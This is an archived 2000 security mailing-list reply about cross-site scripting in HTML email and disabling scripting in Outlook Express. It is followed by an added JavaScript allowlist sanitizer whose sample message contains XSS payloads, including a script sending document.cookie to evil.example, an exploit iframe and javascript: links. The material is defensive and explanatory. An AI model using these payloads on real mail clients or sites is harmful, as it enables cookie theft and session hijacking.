Re: 'cross site scripting' CERT advisory and MS

From: David LeBlanc (dleblancat_private)
Date: Thu Feb 10 2000 - 09:09:09 PST


    After a bit of dinking in vi, I removed the HTML, AND got it properly
    indented for response, so...
    
    >Mark Slemko wrote:
    >
    >>>>2. Do not use a mail reader that forces you to display HTML messages.
    >Using something like Outlook Express is very dangerous, since it
    >means that you can be exploited if an email message arrives in your
    >inbox and is displayed.
    
    This is overkill.  The problem is scripting, not HTML, which are really
    separate issues.
    
    >If you do use something like Outlook
    >Express, be sure to configure it to disable scripting and make it
    >as restrictive as possible.
    
    The way to do this is to open the security tab, choose to run messages in
    the 'untrusted sites' zone, and then configure that zone to run no script
    at all.  Russ Cooper has a nice write-up of all this at
    http://www.ntbugtraq.com/default.asp?sid=1&pid=47&aid=56
    
    >Unfortunately, in the case of Outlook
    >Express, this doesn't appear to be enough since I can't find any
    >setting that will stop things like IFRAMEs from automatically
    >loading, which are enough to make you vulnerable in many situations.
    
    I don't know if this can be done, but disabling scripting for e-mail
    entirely should be enough.
    
    >Hopefully I'm missing something.<<<
    
    If I'm missing something, please let me know.
    
    >I wrote Microsoft a few days ago asking about shutting off HTML in
    >Outlook Express, and here's what they wrote back:
    
    To the best of my understanding of this very complex problem, HTML without
    script isn't going to get you.  Script will get you, and you can turn that
    off.  When I do use outlook, I've been running it with scripting turned off
    for quite some time and have noticed no loss of functionality, other than
    when David Litchfield sends me mail to test one of his latest findings, it
    doesn't work
    8-)
    
    >The gentleman who responded to my query did so promptly, and from what I
    >gather from his wording (I am afraid that inbound functionality for
    >turning off html code is not possible in Internet Explorer as default.)
    
    I don't think you can, though you _can_ toggle between HTML, text, and rich
    text, which would have saved me a few moments getting the HTML out of
    _this_ message if I were using it now.
    
    >I would hazard that OE is inexorably tied to IE (ok, i'm not a
    >programmer, just hazarding a guess...) just like IE has deep hooks into
    >Windows itself, hence the inability to _disable_ reading html in basic
    >email. In fact I had limited my inquiry to turning HTML off in OE.
    
    It uses IE as an HTML viewer, as do many applications.  However, if you'd
    have asked how to turn off scripting, they should have been able to answer,
    and I believe that's all you need to do to make your e-mail safe.
    
    IMHO, the worst problem is with using the browser, since too many sites use
    some form of scripting (like www.securityfocus.com), and you can't turn it
    completely off without losing the ability to do a lot of things.
    
    
    David LeBlanc
    dleblancat_private
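
    [Added example, not part of the message above and not Outlook Express or
    IE code.  The reply's point is that "HTML without script" is safe to
    render; the code below is an allowlist sanitizer that produces exactly
    that from an HTML mail body, in JavaScript since the behaviour in
    question is the browser engine's.  It also drops IFRAME/OBJECT/EMBED and
    remote image sources, the auto-loading elements the quoted message
    worried about, which a "no script" zone setting alone does not address.
    The tag and attribute lists, the cid: rule for inline images and the
    sample message are this example's own choices, constructed for
    illustration.]

```javascript
// Added example, not code from the original thread or from Outlook Express/IE.
// It produces what the reply above calls "HTML without script": an allowlist
// sanitizer for an HTML mail body that drops every script vector (script/style
// elements, on* handlers, style attributes, javascript: URLs) and also the
// auto-loading elements the quoted message worried about (IFRAME, OBJECT,
// EMBED, remote image sources).  Tag names, attribute lists and the sample
// message below are this example's own choices, constructed for illustration.

// Tags a mail reader can render without running anything.
const ALLOWED_TAGS = new Set([
  'p', 'br', 'b', 'i', 'u', 'em', 'strong', 'a', 'ul', 'ol', 'li',
  'blockquote', 'pre', 'code', 'table', 'tr', 'td', 'th', 'img',
  'h1', 'h2', 'h3', 'font', 'div', 'span',
]);
// Elements whose content is dropped along with the tags: script bodies,
// style sheets (IE-era CSS expression()), and anything that loads a document.
const DROP_CONTENT_TAGS = new Set(['script', 'style', 'iframe', 'object', 'embed', 'applet']);
// Per-tag attribute allowlist; every on* handler and every style attribute
// is rejected simply by not being listed.
const ALLOWED_ATTRS = { a: ['href'], img: ['src', 'alt'], font: ['color', 'size'] };

function escapeText(s) {
  // An entity in a text node can never become a tag, so '&' is left alone;
  // only '<' and '>' could reintroduce markup.
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function escapeAttr(s) {
  return s.replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Scheme allowlist.  Whitespace and control characters are stripped first,
// because "jav<TAB>ascript:" is still javascript: to the browser.
function safeUrl(tag, value) {
  const v = value.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
  if (tag === 'img') return v.startsWith('cid:');   // inline attachment only, never a remote fetch
  return /^(https?:|mailto:)/.test(v);
}

function filterAttrs(tag, attrText) {
  const allowed = ALLOWED_ATTRS[tag] || [];
  const attrRe = /([a-zA-Z][\w:-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let kept = '';
  let a;
  while ((a = attrRe.exec(attrText)) !== null) {
    const name = a[1].toLowerCase();
    const value = a[2] ?? a[3] ?? a[4] ?? '';
    if (!allowed.includes(name)) continue;
    if ((name === 'href' || name === 'src') && !safeUrl(tag, value)) continue;
    kept += ` ${name}="${escapeAttr(value)}"`;
  }
  return kept;
}

// Tokenises with a regular expression, which is enough for this demonstration;
// a production filter should feed a real HTML parser, since browsers recover
// from malformed markup in ways a regex does not model.
function sanitizeHtml(html) {
  html = html.replace(/<!--[\s\S]*?-->/g, '').replace(/<![^>]*>/g, '');
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let out = '';
  let pos = 0;
  let skipUntil = null;   // set while inside a DROP_CONTENT element
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    if (skipUntil === null) out += escapeText(html.slice(pos, m.index));
    pos = tagRe.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (skipUntil !== null) {
      if (closing && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_CONTENT_TAGS.has(name)) {
      if (!closing) skipUntil = name;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;   // unknown tag goes, its text stays
    out += closing ? `</${name}>` : `<${name}${filterAttrs(name, m[3])}>`;
  }
  // An unterminated <script> swallows the rest of the message: fail closed.
  if (skipUntil === null) out += escapeText(html.slice(pos));
  return out;
}

// Constructed sample message, not a real mail.
const SAMPLE_MAIL = [
  '<p>Hello <b onmouseover="alert(1)">Mark</b>,</p>',
  '<script>document.location="http://evil.example/"+document.cookie</script>',
  '<iframe src="http://evil.example/exploit.html"></iframe>',
  '<a href="javascript:alert(document.cookie)">click</a>',
  '<a href="http://www.ntbugtraq.com/">Russ\'s write-up</a>',
  '<img src="http://evil.example/beacon.gif" onerror="alert(2)">',
  '<img src="cid:part1@local" alt="inline">',
  '<p>Thanks, 1 &lt; 2 &amp; 3 > 2</p>',
].join('\n');

// What the sanitizer is expected to leave: markup only, nothing that runs or fetches.
const EXPECTED = [
  '<p>Hello <b>Mark</b>,</p>',
  '',
  '',
  '<a>click</a>',
  '<a href="http://www.ntbugtraq.com/">Russ\'s write-up</a>',
  '<img>',
  '<img src="cid:part1@local" alt="inline">',
  '<p>Thanks, 1 &lt; 2 &amp; 3 &gt; 2</p>',
].join('\n');

console.log(sanitizeHtml(SAMPLE_MAIL));
console.log(sanitizeHtml(SAMPLE_MAIL) === EXPECTED ? 'matches expected' : 'MISMATCH');
```

    The allowlist is the whole point: nothing is "recognised as dangerous",
    anything not explicitly permitted is gone, which is why the on* handlers
    and the javascript: link need no special casing beyond the scheme check.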
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:06 PDT